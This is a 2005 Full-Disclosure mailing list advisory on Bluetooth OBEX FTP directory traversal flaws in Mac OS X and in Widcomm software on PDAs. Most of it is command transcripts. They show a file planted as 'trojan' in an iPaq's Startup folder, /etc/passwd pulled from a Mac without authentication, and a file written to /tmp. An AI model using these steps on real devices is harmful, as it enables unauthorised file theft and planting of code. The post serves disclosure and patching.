[Full-disclosure] Bluetooth dot dot attacks (update)

From: KF (lists) (kf_lists_at_digitalmunition.com)
Date: 06/15/05

  • Next message: KF (lists): "[Full-disclosure] DMA[2005-0614a] - 'Global Hauri ViRobot Server cookie overflow'"
    Date: Wed, 15 Jun 2005 02:24:33 -0400
    To: full-disclosure@lists.grok.org.uk
    
    
    

    Somehow this did not make it to the list today. I think I sent it to the
    OLD list address... whoops!

    
    

    in DMA[2005-0502a] I stated that "...I can not confirm nor deny that files can be placed or retrieved via OBEX FTP and
    the ../../ method. I have only been able to list files using my current obex client (Against Mac OSX).

    With a modified version of btftp from Affix-3.2.0 I am now able to confirm that an attacker also has the ability to both
    grab and put files outside of the default drop path when using OBEX ftp.

    Zero authentication is required on OSX if an unpatched machine is being used.

    I can also now state that Widcomm software on PDA's are also affected. This is NOT the same as my object push ../
    vulnerability. This Widcomm bug is yet another bug that has not been disclosed in the past. Some PDA's require
    authentication for OBEX ftp ... some do not.

    Here is an example attack against my HP Ipaq 2215

    animosity:/usr/src/affix-3.2.0# btftp
    Affix version: Affix 3.2.0
    Welcome to btftp (OBEX) tool. Type ? for help.
    Mode: Bluetooth
    ftp> open 00:04:3e:65:a1:c8
    Service found on channel: 3
    Connected.
    ftp> ls
    -rwdx 634 eyiot447.pwi
    drwdx 0 Business
    drwdx 0 Personal
    drwdx 0 Templates
    Command complete.
    ftp> cd ../
    Command complete.
    ftp> ls
    drwdx 0 ..
    Command complete.
    ftp> cd Windows
    Command complete.
    ftp> cd Startup
    Command complete.
    ftp> put /etc/hosts trojan
    Transfer started...
    Transfer complete.
    257 bytes sent in 0.5 secs (5140.00 B/s)
    ftp> ls trojan
    Browsing error: OBEX error: Internal server error (0x50)
    ftp>

    If I go to the iPaq and browse the folder in question the file is sitting right where I placed it.

    Here is an example attack against my Apple OSX machine this shows me grabbing /etc/passwd

    animosity:/usr/src/affix-3.2.0# btftp
    Affix version: Affix 3.2.0
    Welcome to btftp (OBEX) tool. Type ? for help.
    Mode: Bluetooth
    ftp> open 00:11:95:4f:60:1f
    Service found on channel: 15
    Connected.
    ftp> ls
    d---- 0 Faxes
    d---- 0 New Folder
    d---- 0 SC Info
    Command complete.
    ftp> cd ../
    Command complete.
    ftp> ls
    d---- 0 ..
    ----- 195662 4D WebSTAR Installer.log
    d---- 0 johnh
    d---- 0 kevinfinisterre
    d---- 0 Shared
    d---- 0 webstar
    Command complete.
    ftp> cd ../
    Command complete.
    ftp> ls
    d---- 0 ..
    d---- 0 Applications
    d---- 0 automount
    d---- 0 bin
    d---- 0 cores
    ----- 3584 Desktop DB
    ----- 4482 Desktop DF
    d---- 0 dev
    d---- 0 Developer
    ----- 11 etc
    d---- 0 File Transfer Folder
    d---- 0 Library
    ----- 9 mach
    ----- 571184 mach.sym
    ----- 3872560 mach_kernel
    d---- 0 Network
    d---- 0 private
    d---- 0 sbin
    d---- 0 System
    ----- 11 tmp
    d---- 0 Users
    d---- 0 usr
    ----- 11 var
    d---- 0 Volumes
    Command complete.
    ftp> cd etc
    Command complete.
    ftp> ls
    d---- 0 ..
    ----- 753 6to4.conf
    ----- 515 afpovertcp.cfg
    ----- 15 aliases
    ----- 16384 aliases.db
    ----- 1046 amd.conf.template
    ----- 112 amd.map.template
    d---- 0 auth
    ----- 14761 authorization
    ----- 16541 authorization.cac
    ----- 160 bashrc
    d---- 0 charset
    ----- 295 crontab
    ----- 189 csh.cshrc
    ----- 83 csh.login
    ----- 39 csh.logout
    d---- 0 cups
    ----- 24 daily
    d---- 0 defaults
    ----- 0 dumpdates
    ----- 695 efax.rc
    ----- 0 find.codes
    d---- 0 fonts
    ----- 293 fstab
    ----- 150 fstab.hd
    ----- 119 ftpusers
    ----- 576 gdb.conf
    ----- 5678 gettytab
    ----- 699 group
    ----- 491 hostconfig
    ----- 492 hostconfig~
    ----- 0 hosts.equiv
    ----- 0 hosts.lpd
    d---- 0 httpd
    d---- 0 idmap
    ----- 2893 inetd.conf
    ----- 12 kcpassword
    ----- 0 kern_loader.conf
    ----- 30 localtime
    ----- 131072 lowcase.dat
    d---- 0 mach_init.d
    d---- 0 mach_init_per_user.d
    ----- 105 mail.rc
    ----- 891 manpath.config
    ----- 1259 master.passwd
    ----- 88039 moduli
    ----- 28 monthly
    ----- 19 motd
    ----- 905 named.conf
    ----- 53 networks
    ----- 132 notify.conf
    ----- 44 ntp.conf
    d---- 0 openldap
    d---- 0 pam.d
    ----- 1374 passwd
    d---- 0 pdb
    d---- 0 periodic
    ----- 38693 php.ini.default
    d---- 0 postfix
    d---- 0 ppp
    ----- 125 profile
    ----- 5766 protocols
    d---- 0 racoon
    ----- 8099 rc
    ----- 3572 rc.boot
    ----- 4178 rc.cleanup
    ----- 2356 rc.common
    ----- 4763 rc.netboot
    ----- 20 resolv.conf
    d---- 0 resolver
    ----- 13 rmt
    ----- 0 rmtab
    ----- 971 rpc
    ----- 983 rtadvd.conf
    ----- 572576 services
    ----- 170 shells
    ----- 52 slpsa.conf
    ----- 1732 smb.conf
    ----- 1144 ssh_config
    ----- 668 ssh_host_dsa_key
    ----- 590 ssh_host_dsa_key.pub
    ----- 515 ssh_host_key
    ----- 319 ssh_host_key.pub
    ----- 883 ssh_host_rsa_key
    ----- 210 ssh_host_rsa_key.pub
    ----- 2409 sshd_config
    ----- 361 sudoers
    ----- 798 syslog.conf
    ----- 2442 ttys
    ----- 131072 upcase.dat
    ----- 65536 valid.dat
    d---- 0 vfs
    ----- 26 weekly
    ----- 238 xinetd.conf
    d---- 0 xinetd.d
    ----- 0 xtab
    Command complete.
    ftp> get passwd
    Transfer started...
    Transfer complete.
    268564544 bytes received in 0.34 secs (789895717.65 B/s)

    animosity:/usr/local/bin# cat passwd
    ##
    # User Database
    #
    # Note that this file is consulted when the system is running in single-user
    # mode. At other times this information is handled by one or more of:
    # lookupd DirectoryServices
    # By default, lookupd gets information from NetInfo, so this file will
    # not be consulted unless you have changed lookupd's configuration.
    # This file is used while in single user mode.
    #
    # To use this file for normal authentication, you may enable it with
    # /Applications/Utilities/Directory Access.
    ##
    nobody:*:-2:-2:Unprivileged User:/:/usr/bin/false
    root:*:0:0:System Administrator:/var/root:/bin/sh
    daemon:*:1:1:System Services:/var/root:/usr/bin/false
    smmsp:*:25:25:Sendmail User:/private/etc/mail:/usr/bin/false
    lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false
    postfix:*:27:27:Postfix User:/var/spool/postfix:/usr/bin/false
    www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false
    eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false
    mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false
    sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
    qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false
    cyrus:*:77:6:Cyrus User:/var/imap:/usr/bin/false
    mailman:*:78:78:Mailman user:/var/empty:/usr/bin/false
    appserver:*:79:79:Application Server:/var/empty:/usr/bin/false
    unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

    This shows me placing a file in /tmp

    Affix version: Affix 2.1.1
    Wellcome to OBEX ftp. Type ? for help.
    Mode: Bluetooth
    SDP: yes
    ftp> open 00:11:95:4f:60:1f
    Connected.
    ftp> ls
    d---- 0 Faxes
    d---- 0 New Folder
    d---- 0 SC Info
    Command complete.
    ftp> cd ../
    Command complete.
    ftp> cd ../
    Command complete.
    ftp> cd tmp
    Command complete.
    ftp> ls
    d---- 0 ..
    Command complete.
    ftp> put /etc/hosts hosts
    Transfer started...
    Transfer complete.
    257 bytes sent in 0.10 secs (2570.00 B/s)
    ftp> ls
    d---- 0 ..
    d---- 0 501
    ----- 257 hosts
    Command complete.

    Keep in mind that you are using the permissions of the currently logged in user so you may not have access to
    everything.

    It seems pretty trivial to turn these issues into a worm or some other form of automated attack.

    Please apply your Apple updates and turn off that Widcomm stuff if you aren't using it! Do NOT accept requests
    from unknown bluetooth sources.

    enjoy.
    -KF
                                        

    
    

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/


  • Next message: KF (lists): "[Full-disclosure] DMA[2005-0614a] - 'Global Hauri ViRobot Server cookie overflow'"

    Relevant Pages

    • Re: FTP PUT with Store Unique
      ... years ago but had totally forgotten - I appreciated that the STOU command is ... covers the point I want to make which is that the FTP client commands are ... An SUNIQUE command compatible ...
      (bit.listserv.ibm-main)
    • Re: FTP PUT with Store Unique
      ... The best list for topics related to the Communications Server IP ... command or vice versa. ... Instructs the FTP client not to include a name with the STOU ... -- If NONAME is in effect, no name string specifying a foreign_file value follows ...
      (bit.listserv.ibm-main)
    • Re: FTP PUT with Store Unique
      ... a date/time stamp into the name before the FTP step. ... I foolishly assumed when I saw the SUnique parameter that - of course! ... command or vice versa. ... -- If NAME is in effect, the name string specifying a foreign_file value ...
      (bit.listserv.ibm-main)
    • Re: Problem about Window Xp SP2 firewall and the buildin FTP command
      ... I copy your example ftp command file to a.txt saved in C:\dell folder. ... I cannot turn off Windows Firewall, since it is controlled by Domain ...
      (microsoft.public.windowsxp.general)
    • [NT] Multiple Vulnerabilities Found in PlatinumFTPserver
      ... A vulnerability in the product allows remote attackers to cause the server ... to traverse into directories that reside outside the bounding FTP root ... delete files and perform a DoS attack on the server. ... 200 PORT command successful ...
      (Securiteam)